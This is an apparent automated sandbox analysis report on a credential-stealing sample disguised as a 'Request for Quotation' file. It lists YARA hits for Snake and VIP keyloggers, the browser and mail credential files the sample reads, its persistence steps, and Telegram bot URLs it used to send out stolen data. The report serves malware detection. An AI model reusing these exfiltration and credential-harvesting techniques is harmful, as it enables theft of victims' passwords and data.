Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559184 Sample: Request for Quotation MK FM... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 52 reallyfreegeoip.org 2->52 54 api.telegram.org 2->54 56 2 other IPs or domains 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 68 14 other signatures 2->68 8 Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe 7 2->8         started        12 jnqeRRexnD.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 52->64 66 Uses the Telegram API (likely for C&C communication) 54->66 process4 file5 38 C:\Users\user\AppData\...\jnqeRRexnD.exe, PE32 8->38 dropped 40 C:\Users\...\jnqeRRexnD.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp2F66.tmp, XML 8->42 dropped 44 Request for Quotat...4.11.20.bat.exe.log, ASCII 8->44 dropped 70 Adds a directory exclusion to Windows Defender 8->70 72 Injects a PE file into a foreign processes 8->72 14 powershell.exe 23 8->14         started        17 Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe 15 2 8->17         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        74 Antivirus detection for dropped file 12->74 76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 jnqeRRexnD.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 80 Loading BitLocker PowerShell Module 14->80 28 WmiPrvSE.exe 14->28         started        30 conhost.exe 14->30         started        46 api.telegram.org 149.154.167.220, 443, 49737, 49767 TELEGRAMRU United Kingdom 17->46 48 checkip.dyndns.com 158.101.44.242, 49708, 49712, 49715 ORACLE-BMC-31898US United States 17->48 50 reallyfreegeoip.org 188.114.96.3, 443, 49709, 49710 CLOUDFLARENETUS European Union 17->50 32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.75 false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		high
        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
          		high